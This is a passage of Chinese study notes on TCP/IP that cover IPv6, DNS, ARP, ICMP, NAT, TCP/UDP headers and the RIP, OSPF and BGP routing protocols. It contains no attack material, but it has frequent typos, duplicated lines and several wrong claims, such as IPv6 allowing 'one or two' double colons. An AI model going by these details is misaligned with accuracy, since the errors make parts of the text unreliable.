 387 | 利用网络地址的比特分布可以有效地进行分层配置，对被即使有多个子网掩码，对外呈现出的也是同一个网络地址，这样可以更好的构建网络。
 388 | 
 389 | ### 4.6 IPv6
 390 | 
 391 | **IPv6的必要性**
 392 | 
 393 | IPv6是为了根本解决IPv4地址耗尽的问题而被标准化的网际协议。IPv4的地址长度为4个8位字节，而IPv6的地址长度则是原来的4倍，一般写为8个16位字节。但替换IP地址会是更为艰巨的任务。
 394 | 
 395 | **IPv6的特点**
 396 | 
 397 | IPv6具有以下几个特点，这些功能的一部分在IPv4中已经得以实现。而IPv6则将这些统统作为必要的功能，减少了管理员的负担。
 398 | 
 399 | - IP地址的扩大与路由控制表的聚合: IP 地址依然适应互联网分层构造。分配与其地址结构相适应的 IP 地址,尽可能避免路由表膨大。
 400 | - 性能提升: 包首部长度采用固定的值(40字节),不再采用首部检验码。简化首部结构,减轻路由器负荷。路由器不再做分片处理(通过路径 MTU 发现只由发送端主机进行分片处理)。
 401 | - 支持即插即用功能: 即使没有 DHCP 服务器也可以实现自动分配 IP 地址。
 402 | - 支持即插即用功能: 即使没有 DHCP 服务器也可以实现自动分配 IP 地址。
 403 | 
 404 | **IPv6中IP地址的标记方法**
 405 | 
 406 | IPv6地址长度为128位，能表示的数字高达38位，足以包含人们所能想到所有主机和路由器分配地址。
 407 | 
 408 | 如果将IPv6也用十进制数据表示的话，是16个数字的序列。但用16个数字序列表示显得麻烦，因此，将128比特IP地址以每16比特为一组，每组用冒号（；）隔开进行标记，而且如果出现连续的0时还可以将这些0省略，并用两个冒号（：：）隔开，但是**一个IP地址中只允许出现一两个连续的冒号**。
 409 | 
 410 | **IPv6地址的结构**
 411 | 
 412 | IPv6类似IPv4，也是通过IP地址的前几位标识IP地址的种类。
 413 | 
 414 | 在互联网通信中,使用一种全局的单播地址。它是互联网中唯一的一个地址,不需要正式分配 IP 地址。
 415 | 
 416 | **全局单播地址**
 417 | 
 418 | 全局单播地址是指世界上唯一的一个地址，它是互联网通信以及各个域内部通信中最为常用的一个IPv6地址。现在IPv6的网络中所使用的格式为，n = 48，m = 16以及128-n-m = 64，即前64比特为网络标识，后64位为主机标识。
 419 | 
 420 | ## 第五章 IP 协议相关技术
 421 | 
 422 | ### 5.2 DNS
 423 | 
 424 | 我们平常在访问某个网站时不使用 IP 地址,而是用一串由罗马字和点号组成的字符串。而一般用户在使用 TCP / IP 进行通信时也不使用 IP 地址。能够这样做是因有了 DNS ( Domain Name System )功能的支持。 DNS 可以将那串字符串自动转换为具体的 IP 地址。
 425 | 
 426 | **IP地址不便记忆**
 427 | 
 428 | TCP/IP要求每一个互联的计算机都具有其唯一的IP地址，并基于这个IP地址进行通信。但IP地址是由一串数据序列组成，并不好记。
 429 | 
 430 | 为此，就有了一种叫做主机识别码的东西。这种识别方式是指为每台计算机赋以唯一的主机名，在进行网络通信时可以直接使用主机名称而无需输入一长串的IP地址。并且此时，系统必须自动将主机名转换为具体的IP地址。为了实现这样的功能，主机往往会利用一个叫做hosts文件才能正常使用网络。但随着网络规模的扩大，这种方式慢慢变得不再适用。
 431 | 
 432 | **DNS的产生**
 433 | 
 434 | 在上述背景下，产生了一个可以有效管理主机名和IP地址之间对应关系的系统，那就是DNS系统。可以用来维护一个表示组织内部主机和IP地址之间对应关系的数据库。
 435 | 
 436 | **域名的构成**
 437 | 
 438 | 在理解DNS规范时，首先要理解什么是域名，域名是指为了识别主机名称和组织机构名称的一种具有分层的名称。
 439 | 
 440 | DNS的分层如下所示，由于看起来像一颗倒挂的树，人们也把这种分层结构叫做**树形结构**。
 441 | 
 442 | **DNS查询**
 443 | 
 444 | 解析器为了调查IP地址，向域名服务器进行查询处理，接收这个查询请求的域名服务器首先会在自己的数据库进行查找，如果有该域名对应的IP地址就返回。如果没有，则域名服务器在向上一层根域名服务器进行查询处理。
 445 | 
 446 | 解析器和域名服务器将最新了解到的信息暂时保存在缓存里。这样，可以减少每次查询时的性能消耗。
 447 | 
 448 | **DNS如同互联网中的分布式数据库**
 449 | 
 450 | DNS是一种通过主机名检索IP地址的系统。然而，它所管理的信息不仅仅是这些主机名和IP地址之间的映射信息。
 451 | 
 452 | 它还要管理众多其他信息，例如，主机名与IP地址的对应信息叫做A记录。反之，从IP地址检索主机名称的信息叫做PTR。此外，上层或下层域名服务器IP地址的映射叫做NS记录。
 453 | 
 454 | 在此特别需要指出的是MX记录，这类记录中注册了邮件地址与邮件接收服务器的主机名。
 455 | 
 456 | ### 5.3 ARP
 457 | 
 458 | 
 459 | 只要确认了IP地址，就可以向这个目标地址发送IP数据报。然而，在底层数据链路层，进行实际通信时却有必要了解每个IP地址所对应的MAC地址。
 460 | 
 461 | **ARP概要**
 462 | 
 463 | ARP是一种解决地址问题的协议。以目标IP为线索，用来定位下一个应该接收数据分包的网络设备对应的MAC地址。
 464 | 
 465 | **ARP的工作机制**
 466 | 
 467 | 那ARP是如何知道MAC地址的呢？
 468 | 
 469 | ARP是借助**ARP请求**与**ARP响应**两种类型的包确认MAC地址的。
 470 | 
 471 | 主机A为了获得主机B的MAC地址，起初要通过**广播发送**一个**ARP请求包**。这个包中包含了想要了解其MAC地址的IP地址，由于广播的包可以被同一条链路上的所有主机和路由器进行解析，如果请求包的IP地址与自己的IP地址一致，那么这个节点就将自己的MAC地址塞入ARP响应包返回给主机。
 472 | 
 473 | **IP地址和MAC地址缺一不可**
 474 | 
 475 | 尽管数据链路层需要MAC就可发送，IP一个广播（浪费流量）就能发送到区间段。但发送给其他数据链路的某一个主机，就需要两者结合了。
 476 | 
 477 | **代理ARP**
 478 | 
 479 | 通常ARP包会被路由器隔离，但是使用代理ARP的路由器可以将ARP请求转发给相邻的网段。由此，两个以上网段的节点之间可以像在同一个网段中一样通信。
 480 | 
 481 | ### 5.4 ICMP
 482 | 
 483 | **辅助IP的ICMP**
 484 | 
 485 | 架构IP网络时要特别注重两点：确认网络是否正常工作，以及遇到问题时进行问题诊断。
 486 | 
 487 | 例如,一个刚刚搭建好的网络,需要验证该网络的设置是否正确。此外,为了确保网络能够按照预期正常工作,一且遇到什么问题需要立即制止问题的蔓延。为了减轻网络管理员的负担,这些都是必不可少的功能。 ICMP 正是提供这类功能的一种协议。
 488 | 
 489 | **ICMP 的主要功能**包括,确认IP包是否成功送达目标地址,通知在发送过程当中IP包被废弃的具体原因,改善网络设置等。有了这些功能以后,就可以获得网络是否正常、设置是否有误以及设备有何异常等信息,从而便于进行网络上的问题诊断。
 490 | 
 491 | ICMP的消息大致可以分为两类：一类是**通知出错的错误信息**，另一种是用于**诊断的查询信息**。
 492 | 
 493 | **主要的ICMP信息**
 494 | 
 495 | - **ICMP目标不可达信息**: IP路由器无法将IP数据包发送给目标地址时，会给发送端主机返回一个目标不可达的ICMP信息，并在这个消息中显示不可达的具体原因。
 496 | - **ICMP目标重定向信息**: 如果路由器发现发送端主机使用了次优的路径发送数据，那么它会返回一个ICMP重定向的消息给这个主机。在这个消息中包含了最合适的路由信息和数据。这主要发生在路由器持有更好路由信息的情况下。路由器会通过这样的ICMP消息给发送端主机一个更合适的发送路由。
 497 | - **ICMP目标超时信息**: IP包中有一个字段叫做TTL（生存周期），它的值随着每经过一次路由器就会减1，直到减到0该IP包会被丢弃。此时，IP路由器将会发送一个ICMP超时的信息，并通知该包已被丢弃。
 498 | - **ICMP目标回送信息**（类型0，8）用于进行通知的主机或路由器之间，判断所发送的数据包是否已经成功到达对端的一种信息，可以向对端主机发送回送请求的消息（类型8），也可以接收对端主机发回来的回送应答消息（类型0）。
 499 | 
 500 | **ICMPv6**
 501 | 
 502 | IPv4中ICMP仅作为一个辅助功能，但在IPv6中，ICMP的作用被扩大，如果没有IPMv6,IPv6就无法实现正常通信。
 503 | 
 504 | ICMPv6中大致分为两类：一类是**错误信息**，另一类是**信息消息**。类型0~127属于错误消息，128~255属于信息消息。
 505 | 
 506 | **邻居探索**
 507 | 
 508 | ICMPv6中从类型133至137的消息叫做邻居探索信息。**邻居请求**信息用于查询IPv6的地址与MAC地址的对应关系，并由邻居宣告得知MAC地址。邻居请求信息利用IPv6的多播第hi实现传输。
 509 | 
 510 | ### 5.5 DHCP
 511 | 
 512 | **DHCP实现即插即用**
 513 | 
 514 | 如果逐一为每一台计算机设置IP地址会是非常繁琐的事，于是为了实现自动设置IP地址，统一管理IP地址分配，就产生了DHCP协议。有了DHCP，即插即用变成可能。
 515 | 
 516 | **DHCP的工作机制**
 517 | 
 518 | 使用DHCP之前，首先要架设一台**DHCP服务器**，然后将DHCP所要分配的IP地址设置到服务器上。从DHCP中获取IP地址的流程，简单来说，主要分为两个阶段。
 519 | 
 520 | ### 5.6 NAT
 521 | 
 522 | **NAT定义**
 523 | 
 524 | NAT是用于本地网络中使用私有地址，在连接互联网时转而使用全局IP地址的技术。除转换IP地址外，还出现了可以转换TCP,UDP端口号的NAPT技术。由此可以实现一个全局IP地址与多个主机的通信。
 525 | 
 526 | **NAT的工作机制**
 527 | 
 528 | NAT服务器内部，有一张自动生成的用来转换地址的表。当私有网络内的多台机器同时都要与外部进行通信时，仅仅转换IP地址，人们不免担心全局IP地址是否不够用。这时采用包含端口号一起转换的方式可以解决这个问题。 
 529 | 
 530 | ### 5.7 IP 隧道
 531 | 
 532 | 为了让不同协议 (如 IPv4 和 IPv6)之间正常通信，这时必须采用**IP隧道**的功能。
 533 | 
 534 | IP隧道可以将那些从网络A发过来的**IPv6**的包**统和**为一个数据，再为之**追加**一个**IPv4的首部**以后转发给网络C。
 535 | 
 536 | 一般情况下，紧接着IP首部的时TCP或UDP的首部，然而，现在应用当中“IP首部的后边还是IP首部”或“IP首部的后面是IPv6的首部”等情况日益俱增。这种再网络层后面继续追加网络层首部的通信方法就叫做“IP隧道”。
 537 | 
 538 | ## 第六章 TCP与UDP
 539 | 
 540 | ### 6.1 传输层的作用
 541 | 
 542 | TCP/IP中有两个具有代表性的传输层协议，它们分别是TCP和UDP。TCP提供**可靠**的通信传输，UDP则常被用于让广播和细节控制交给应用的通信传输。
 543 | 
 544 | **传输层定义**
 545 | 
 546 | IP首部中有一个协议字段，用来标识网络层的上一层采用的是哪一种传输层协议。
 547 | 
 548 | 传输层的TCP和UDP，为了识别自己所传输的数据部分究竟应该发给哪个应用，也设置了这样一个编号。
 549 | 
 550 | 以包裹为例,邮递员( IP )根据收件人地址(目标IP地址)向目的地(计算机)投递包裹( IP数据报)。包裏到达目的地以后由对方(传输层协议)根据包裘信息判断最终的接收人(接收端应用程序)。
 551 | 
 552 | **通信协议**
 553 | 
 554 | TCP / IP 的众多应用协议大多以客户端/服务端的形式运行。客户端类似于客户的意思,是请求的发起端。而服务端则表示提供服务的意思,是请求的处理端。另外,作为服务端的程序有必要提前启动,准备接收客户端的请求。否则即使有客户端的请求发过来,也无法做到相应的处理。
 555 | 
 556 | **两种传输层协议TCP和UDP**
 557 | 
 558 | - **TCP:** 是**面向连接**的，**可靠的流协议**。流就是指**不间断**的数据结构。当应用程序采用TCP发送消息时，虽然可以保证发送的顺序，但还是犹如没有任何间隔的数据流发送给接收端。
 559 | - **UDP:** 是不具有可靠性的数据报协议。细微的处理它会交给上是的应用去完成。在 UDP 的情况下,虽然可以确保发送消息的大小,却不能保证消息一定会到达。
 560 | 
 561 | **TCP 与 UDP 的区别**
 562 | 
 563 | TCP可靠, UDP高效
 564 | 
 565 | ### 6.2 端口号
 566 | 
 567 | **端口号定义**
 568 | 
 569 | 数据链路和IP中的地址，分别指的是MAC地址和IP地址。前者用来识别同一链路中不同的计算机,后者用来识别 TCP / IP 网络中互连的主机和路由器。在传输层中也有这种类似于地址的擬念,那就是端口号。**端口号**用来**识别同一台计算机**中进行通信的**不同应用程序**。因此,它也被称为程序地址。
 570 | 
 571 | **根据端口号识别应用**
 572 | 
 573 | 一台计算机上可同时运行多个程序，传输层协议正是利用这些端口号识别本机中正在进行通信的应用程序。
 574 | 
 575 | **端口号如何确定**
 576 | 
 577 | 确认端口号的方法分为两种：
 578 | 
 579 | - 标定即成的端口号: 这种方法也叫静态方法。它是指每个应用程序都有其指定的端口号。但并不亜器是说可以随意使用任何一个端口号。每个端口号都有其对应的使用目的。
 580 | - 时序分配法: 此时，服务器有必要确定监听段端口号，但是接收服务的客户端没必要确认端口号。在这种方法下,客户端应用程序可以完全不用自己设置端口号,而全权交给操作系统进行分配。操作系统可以为每个应用程序分配互不冲突的端口号。例如每需要一个新的缩口号时,就在之前分配号码的基础上加1。这样,操作系統就可以动态地管理端口号了。动态分配到端口号取值范围在49152到65535之间
 581 | 
 582 | **端口号与协议**
 583 | 
 584 | **端口号由其使用的传输层协议决定**。因此,**不同的传输协议可以使用相同的端口号**。例如, TCP 与 UDP 使用同一个端口号,但使用目的各不相同。这是因为端口号上的处理是根据每个传输协议的不同而进行的。 
 585 | 
 586 | 
 587 | 数据到达IP层后,会先检查 IP 首部中的协议号,再传给相应协议的模块如果是 TCP 则传给 TCP 模块、如果是 UDP 则传给 UDP 模块去做端口号的处理即使是同一个端口号,由于传输协议是各自独立地进行处理,因此相互之间不会受到影响。
 588 | 
 589 | ### 6.3 UDP
 590 | 
 591 | **UDP的特点及其目的**
 592 | 
 593 | UDP不提供复杂的控制机制，利用IP提供面向无连接的通信服务。并且它是将应用程序发来的数据在收到的那一刻，立刻按照原样发送到网络上的一种机制。
 594 | 
 595 | 由于 UDP 面向无连接,它可以随时发送数据。再加上 UDP 本身的处理既**简单又高效**,因此经常用于以下几个方面:
 596 | 
 597 |  - 包总量较少的通信( DNS 、 SNMP 等)
 598 | - 视频、音频等多媒体通信(即时通信)
 599 | - 限定于 LAN 等特定网络中的应用通信
 600 | - 广播通信(广播、多播)
 601 | 
 602 | ### 6.4 TCP
 603 | 
 604 | 与UDP不同，TCP是对 “**传输，发送，通信**” 进行“**控制**”的“协议”。
 605 | 
 606 | TCP 与 UDP 的区别相当大。它充分地实现了数据传输时各种**控制功能**,可以进行丢包时的**重发控制**,还可以对次序乱掉的分包进行**顺序控制**。而这些在 UDP 中都没有。此外, TCP 作为一种面向有连接的协议,只有在确认通信对端存在时才会发送数据,从而可以控制通信流量的浪费。
 607 | 
 608 | 根据 TCP 的这些机制,在 IP 这种无连接的网络上也能够实现高可靠性的通信。
 609 | 
 610 | **TCP的特点及其目的**
 611 | 
 612 | 为了通过 IP 数据报实現可靠性传输,需要考虑很多事情,例如数据的破坏丢包、重复以及分片順序混乱等问题。如不能解决这些问题,也就无从谈起可靠传输。 TCP 通过检验和、序列号、确认应答、重发控制、连接管理以及窗口控制等机制实现可靠性传输。
 613 | 
 614 | **通过序列号与确认应答提高可靠性**
 615 | 
 616 | 在TCP中，当发送端的数据到达接受主机时，接收端主机会返回一个已收到消息的通知，这个信息叫做**确认应答**。
 617 | 
 618 | 在一定时间内没有等到确认皮答,发送端就可以认为数据已经丢失,并进行重发。由此,即使产生了**丢包**,仍然能够保证数据能够到达对端，实现**可靠传输**。
 619 | 
 620 | 未收到确认应答并不宜味着数据一定丢失。也有可能是数据对方已经收到只是**返回的确认应答在途中丢失**。这种情况也会导致发送端因没有收到确认应答,而认为数据没有到达目的地,从而进行重新发送。如下图所示。
 621 | 
 622 | **重发超时如何确定**
 623 | 
 624 | 重发超时是指在重发数据之前,等待确认应答到来的那个**特定时间间隔**。如果超过了这个时间仍未收到确认应答,发送端将进行数据重发。那么这个重发超时的具体时间长度又是如何确定的呢?
 625 | 
 626 | 最理想的是,找到一个最小时间,它能保证 “**确认应答一定能在这个时间内返回**” 。然而这个时间长短随着数据包途径的网络环境的不同而有所变化。例如在高速的 LAN 中时间相对较短,而在长距离的通信当中应该比 LAN 要长一些。
 627 | 
 628 | 为了保持TCP的高性能通信，在每次发包时都会计算往返时间及其偏差，将这个往返时间和偏差相加重发超时的时间，就是比这个总和稍大一点的值。
 629 | 
 630 | **连接管理**
 631 | 
 632 | TCP提供**面向有连接**的通信传输，面向有连接是指在数据通信开始之前先做好通信两端之间的准备工作。TCP会在数据通信之前,通过 TCP 首部发送一个**SYN包**作为建立连接的请求等待确认应答。如果对端发来**确认应答**,则认为可以进行数据通信。如果对端的确认应答未能到达,就不会进行数据通信。此外,更多细节请参在通信结束时会进行断开连接的处理(FIN包)。
 633 | 
 634 | 可以使用 TCP 首部用于控制的字段来管理 TCP 连接。一个连接的建立与断开,正常过程至少需要来回发送7个包才能完成。
 635 | 
 636 | **TCP以段为单位发送数据**
 637 | 
 638 | 在建立TCP连接的同时，也可以确认发送数据包的单位，我们也可以称其为“**最大消息长度**”（MSS）。最理想的情况是，最大信息长度正好是IP中不会被分片处理的最大数据长度。
 639 | 
 640 | **利用窗口控制提高速度 (窗口传输知识点需要配合图解, 建议阅读原文或者查找一些资料)**
 641 | 
 642 | TCP 以1个段为单位,每发一个段进行一次确认应答的处理。这样的传输方式有一个缺点。那就是,包的往返时间越长通信性能就越低。
 643 | 
 644 | 为了解决这个问题，TCP引入了**窗口**这个概念，即使往返较长的情况下，它也能控制网络性能的下降。如图所示,确认应答不再是以每个分段,而是以更大的单位进行确认时,转发时间将会被大幅度的缩短。也就是说,发送端主机,在发逸了一个段以后不必要一直等待确认应答,而是继续发送。
 645 | 
 646 | 窗口大小就是指无需等待确认应答而可以继续发送数据的最大值.
 647 | 
 648 | **窗口控制与重发控制**
 649 | 
 650 | 在使用窗口控制中，如果出现了段丢失该怎么办？
 651 | 
 652 | 首先,我们先考虑**确认应答未能返回的情况**。在这种情况下,数据已经到达对端,是不需要再进行重发的。然而,在没有使用窗ロ控制的时候,没有收到确认应答的数据都会被重发。而使用了窗口控制,就如下图所示,某些确认应答即便丢失也无需重发。
 653 | 
 654 | 其次，我们来考虑一下**某个报文段丢失**的情况，接受主机如果收到一个应该接收的序号以外的数据时，会针对当前为止收到数据返回取人应答。
 655 | 
 656 | **流控制**
 657 | 
 658 | 接收端将本应该接收的数据丢弃的话,就又会触发重发机制,从而导致网络流量的无端浪费。为了防止这种现象的发生, TCP 提供一种机制可以让**发送端根据接收端的实际接收能力控制发送的数据量**。这就是所谓的流控制。
 659 | 
 660 | 它的具体操作是,接收端主机向发送端主机通知自己可以接收数据的大小,于是发送端会发送不超过这个限度的数据。该大小限度就被称作窗口大小。
 661 | 
 662 | 为了在发送端调节所要发送数据的量，定义了一个加做“拥塞窗口”的概念。 
 663 | 
 664 | **使用TCP的应用**
 665 | 
 666 | 到此为止，我们了解到各种各样的控制机制。TCP采用这些机制可以提供高速，可靠的通信服务。
 667 | 
 668 | 如果需要应用自己处理一些更为细节上的控制,使用 UDP 协议是不错的选择。如果转发数据量较多、对可靠性的要求比较高时,可以选择使用 TCP 。 TCP 和 UDP 两者各有长短,在设计和开发应用时,应准确掌握它们各自协议的特点酌情选择。
 669 | 
 670 | ### 6.6 UDP 首部的格式
 671 | 
 672 | UDP首部由源端口号，目标端口号，包长和校验和组成。
 673 | 
 674 | - **源端口号**: 表示发送端端口号，字段长16位。该字段是可选项，有时可能不会设置端口号，没有根端口号的时候该字段的值设置位0，可用于**不需要返回的通信中**。
 675 | - **目标端口号**: 表示接收端端口，字段长度16位。
 676 | - **包长度**: 该字段保存了UDP首部的长度跟数据的长度之和，单位为字节（八位字节）。
 677 | - **校验和**: 校验和是为了提供可靠的UDP首部根数据而设计。
 678 | 
 679 | ### 6.7 TCP 首部格式
 680 | 
 681 | TCP首部相比于UDP首部要复杂的多, 建议参考原文或者阅读相关资料
 682 | 
 683 | - **源端口号**: 表示发送端端口号，字段为16位。
 684 | - **目标端口号**: 表示接收端端口号，字段为16位。
 685 | - **序列号**: 字段长32位，序列号是指发送数据的位置，每发送一次数据，就累计一次该数据字节数的大小。
 686 | - **确认应答号**: 确认应答号字段长度32位，是指下一次应该收到的数据的序列号。
 687 | - **数据偏移**: 该字段表示TCP所传输的数据部分应该从TCP包的哪个位开始计算，当然也可以把它看成TCP数不对长度。
 688 | - **保留**: 该字段主要是为了以后拓展时，其长度为4位。一般设置为0，但即使收到的包在该字段不为0，此包也不会被丢弃。
 689 | - **控制位**: 字段长为 8 位，每一位从左到右分别为 CWR、ECE、URG、ACK、PSH、RST、SYN、Fin。
 690 | 
 691 | ## 第七章 路由协议
 692 | 
 693 | ### 7.1 路由控制的定义
 694 | 
 695 | **IP地址与路由控制**
 696 | 
 697 | 互联网是由路由器连接的网络组合而成的。为了能让数据包正确达地到达目标主机,路由器必须在途中进行正确地转发。这种向“正确的方向”转发数据所进行的处理就叫做**路由控制**或**路由**。
 698 | 
 699 | **静态路由和动态路由**
 700 | 
 701 | 那么,是谁又是怎样制作和管理路由控制表的呢?路由控制分静态＂和动态＂两种类型。
 702 | 
 703 | 静态路由是指事先设置好路由器和主机中并将路由信息固定的一种方法。而动态路由是指让路由协议在运行过程中自动地设置路由控制信息的一种方法。这些方法都有它们各自的利弊。
 704 | 
 705 | 不论是静态路由还是静态路由，不要只使用其中一种，可以将它们组合起来使用。
 706 | 
 707 | **动态路由的基础**
 708 | 
 709 | 动态路由会给相邻路由器发送自己已知的网络连接信息,而这些信息又像接力一样依次传递给其他路由器,直至整个网络都了解时,路由控制表也就制作完成了。而此时也就可以正确转发IP 数据包了。
 710 | 
 711 | ### 7.4 RIP
 712 | 
 713 | RIP是距离向量型的一种路由协议，广泛用于LAN。
 714 | 
 715 | **广播路由控制信息**
 716 | 
 717 | RIP将路由控制信息定期（30秒一次）向全网广播，如果没有收到路由控制信息,连接就会被断开。不过,这有可能是由于丢包导致的,因此 RIP 规定等待5次。如果等了6次(180秒)仍未收到路由信息,才会真正关闭连接。
 718 | 
 719 | **根据距离向量确定路由**
 720 | 
 721 | RIP 基于距离向量算法决定陪经。距离( Metnes )的单位为“跳数”。跳数是指所经过的路由器的个数。 RIP 希望尽可能少通过路由器将数据包转发到目标 IP 地址,如下图所示。根据距离向量生成距离向量表,再抽出较小的路由生收最终的路由控制表。
 722 | 
 723 | **RIP2**
 724 | 
 725 | RIP2是RIP第二版，与第一版工作机制基本相同，不过有如下几个新的特点。
 726 | 
 727 | - **使用多播**: RIP 中当路由器之间交换路由信息时采用广播的形式,然而在RIP2中改用了多播。这样不仅减少了网络的流量,还缩小了对无关主机的影响。
 728 | - **支持子网掩码**: 与 OSPF 类似的,RIP2支持在其交换的路由信息中加人子网掩码信息。
 729 | - **路由选择域**: 与OSPF的区域类似,在同一个网络中可以使用逻辑上独立的多个 RIP 。
 730 | - **外部路由标志**: 通常用于把从 BGP 等获得的路由控制信息通过 RIP 传递给 AS 内。
 731 | - **身份验证密钥**: 与OSPF一样,RIP包中掷带密码。只有在自己能够识别这个密码时才接收数据,否则忽略这个RIP包。
 732 | 
 733 | ### 7.5 OSPF
 734 | 
 735 | OSPF ( Open Shortest Path First )是根据 OSI 的IS-IS协议而提出的一种链路状态型路由协议。由于采用链路状态类型,所以即使网络中有环路,也能够进行稳定的路由控制。
 736 | 
 737 | 另外, OSPF 支持子网掩码。由此,曾经在 RIP 中无法实现的可变长度子网构造的网络路由控制成为现实。
 738 | 
 739 | 甚至为了减少网络流量, OSPF 还引人了“区域”这一概念。区域是将一个自治网络划分为若干个更小的范围。由此,可以减少路由协议之间不必要的交换。
 740 | 
 741 | OSPF可以针对 IP 首部中的区分服务(T0s)字段,生成多个路由控制表。不过,也会出现已经实现了 OSPF 功能的路由器无法支持这个TOS的情况。
 742 | 
 743 | **OSPF是链路状态型路由协议**
 744 | 
 745 | OSPF为链路状态型路由器。路由器之间交换链路状态生成网络拓扑信息，然后再根据这个拓扑信息生成路由控制表。
 746 | 
 747 | RIP的路由选择，要求途中所经过的路由器个数越少越好。与之相比，OSPF可以给每条链路赋予一个权重，并选择一个权重最小的路径作为最终路由。
 748 | 
 749 | **OSPF基础知识**
 750 | 
 751 | OSPF中，把连接到同一个链路的路由器称作相邻路由器。简单的网络结构中，相邻路由器之间可以交换路由信息，但再复杂到达网络中，是确定一个制定路由器，并以它为中心交换路由信息即可。
 752 | 
 753 | 在OSPF中，根据作用的不同可以分为5种类型的包。 
 754 | 
 755 | - 问候: 确认相邻路由器, 确定指定路由器
 756 | - 数据库描述: 链路状态数据库的摘要信息
 757 | - 链路状态请求: 请求从数据库中获取链路状态信息
 758 | - 链路状态更新: 更新链路状态数据库中的状态信息
 759 | - 链路状态确认应答: 链路状态信息更新的确认应答
 760 | 
 761 | **OSPF工作原理概述**
 762 | 
 763 | OSPF种进行连接确认端协议叫做HELLO协议。
 764 | 
 765 | LAN 中每10秒发送一个HELLO包。如果没有HELLO包到达,则进行连接是否断开的判断。具体为,允许空等3次,直到第4次(40秒后)仍无任何反应就认为连接已经断开。之后在进行连接断开或恢复连续操作时,由于链路状态发生了变化,路由器会发送一个链路状态更新包通知其他路由器网络状态的变化。
 766 | 
 767 | 链路状态通知包所要传达的消息大致分为两类：一是网络链路状态通告，二是路由器链路状态通告。
 768 | 
 769 | **将区域分层化进行细分管理**
 770 | 
 771 | 链路状态型路由协议的潜在问题在于，当网络规模越来越大时,表示链路状态的拓扑数据库就变得越来越大,路由控制信息的计算也就越困难。OSPF为了减少计算负荷,引人了**区域**的概念。
 772 | 
 773 | 区域是指连接在一起的网络和主机划分为小组，使一个**自治系统 (AS)** 内可以拥有多个区域。不过具有多个区域的自治系统必须要有一个**主干区域**，并且所有其他区域必须都与这个主干系统相连接。
 774 | 
 775 | 连接区域与主干区城的路由器称作**区域边界路由器**;而区域内部的路由器叫做内部路由器;只与主干区域内连接的路由器叫做主干路由器;与外部相连接的路由器就是 AS边界路由器。
 776 | 
 777 | 每个区域内的路由器都持有本区域网络拓扑的数据库。至于区域之外的路径信息，只能从区域边界路由器那里获取他们的距离。 
 778 | 
 779 | 只了解区域内部的链路状态信息，减轻了处理的负担。
 780 | 
 781 | 此外, 作为区域出口的区域边界路由器若只有一个的话叫做**末端区域**。末端区域内不需要发送区域外的路由信息。它的区域边界路由器将成为默认路径传送路由信息即可。因此,由于不需要了解到达其他各个网络的距离,所以它可以减少一定地路由信息。
 782 | 
 783 | 要想在OSPF中构造一个稳定的网络,物理设计和区域设计同样重要。如果区域设计不合理,就有可能无法充分发挥 OSPF 的优势。
 784 | 
 785 | ### 7.6 BGP
 786 | 
 787 | 边界网关协议是连接不同组织机构的一种协议。
 788 | 
 789 | 边界网关协议是连接不同组织机构的一种协议。
 790 | 
 791 | **BGP与AS号**
 792 | 
 793 | 在RIP和OSPF中利用IP的网络地址进行着路由控制，然而BGP则需要**放眼整个互联网互联网进行路由控制**，BGP的最终路由控制表由**网络地址**和**下一战的路由器组**来表示，不过它会根据所要经过的AS个数进行路由控制。
 794 | 
 795 | ISP,区域网络等会将每个网络编制成一个个**自治系统**进行控制。它们为每个自治系统分配一个16比特的AS编号，BGP就是根据这个编号进行相应的路由控制。
 796 | 
 797 | **BGP是路径向量协议**
 798 | 
 799 | 根据 BCP 交换路由控制信息的路由器叫做 BCP 扬声器。 BCP 扬声器为了在 AS 之间交换 BCP 信息,必须与所有 AS 建立对等的 BCP 连接。
 800 | 
 801 | ## 第八章 应用协议
 802 | 
 803 | ### 8.1 应用层协议概要
 804 | 
 805 | 之前介绍的主要是指OSI参考模型的下半部分，从本章开始介绍OSI上半部分。(应用层/表示层/会话层)
 806 | 
 807 | **应用协议的定义**
 808 | 
 809 | 利用网络的应用程序有很多,包括 Web 浏览器、电子邮件、远程登录、文件传输、网络管理等。能够让这些应用进行特定通信处理的正是应用协议。 
 810 | 
 811 | TCP 和 IP 等下层协议是不依赖于上层应用类型、适用性非常广的协议。而应用协议则是为了实现某种应用而设计和创造的协议。
 812 | 
 813 | **应用协议与协议的分层**
 814 | 
 815 | 网络应用由不同的用户和软件供应商开发而成。为了实现网络应用的功能,在应用之间进行通信时将其连接的网络协议是非常重要的”。设计师和开发人员根据所开发模块的功能和目的,可以利用现有的应用协议,也可以自己定义一个新的应用协议。
 816 | 
 817 | 应用可以直接享用传输层以下的基础部分。因为开发者只要关心选用哪种应用协议、如何开发即可,而不必担心应用中的数据该以何种方式发送到目标主机等问题。这也是得益于网络层的功劳。
 818 | 
 819 | 相当于OSI中第5，第6，第7层的协议
 820 | 
 821 | ### 8.2 远程登录
 822 | 
 823 | 远程登陆是为了实现TSS（**分时系统**：分时是指多个用户分享使用同一台计算机）环境，将终端和主机相连。
 824 | 
 825 | 从自己的本机计算机登录到网络另一端的应用就叫远程登陆。
 826 | 
 827 | **TELNET**
 828 | 
 829 | TELNET 利用 **TCP** 的一条连接,通过这一条连接向主机发送文字命令并在主机上执行。本地用户好像直接与远端主机内部的 Shell 相连着似的,直接在本地进行操作。
 830 | 
 831 | TELNET 可以分为两类基本服务。一是仿真终端功能,二是协商选项机制。
 832 | 
 833 | 通过TELNET登陆主机或路由器等设备时需要将自己的登陆用户名和密码注册到服务端。
 834 | 
 835 | TELNET中除了处理用户所输入的文字外，还提供选项的交互和协商功能。
 836 | 
 837 | - 行模式: 每从键盘输入一个换行，就将该行的数据作为1整行发送给服务端B
 838 | - 透明模式: 客户端A每输人一个字符都要发送给服务端B
 839 | 
 840 | **SSH**
 841 | 
 842 | SSH是加密的远程登陆系统。SSH还包括很多非常方便的功能。
 843 | 
 844 | - 可以使用更强的认证机制。
 845 | - 可以转发文件。
 846 | - 可以使用端口转发功能。
 847 | 
 848 | 端口转发是指将特定端口号所收到的消息转发到特定的 IP 地址和端口号码的一种机制。由于经过 SSH 连接的那部分内容被加密,确保了信息安全,提供了更为灵活的通信。
 849 | 
 850 | ### 8.3 文件传输
 851 | 
 852 | FTP是在两个相连的计算机之间进行文件传输时使用的协议。FTP中也需要在登录到对方对方的计算机后才能进行相应的操作。
 853 | 
 854 | **FTP的工作机制概要**
 855 | 
 856 | FTP使用两条TCP连接：一条用来控制，另一条用于数据的传输。以此实现文件传输功能
 857 | 
 858 | ### 8.4 电子邮件
 859 | 
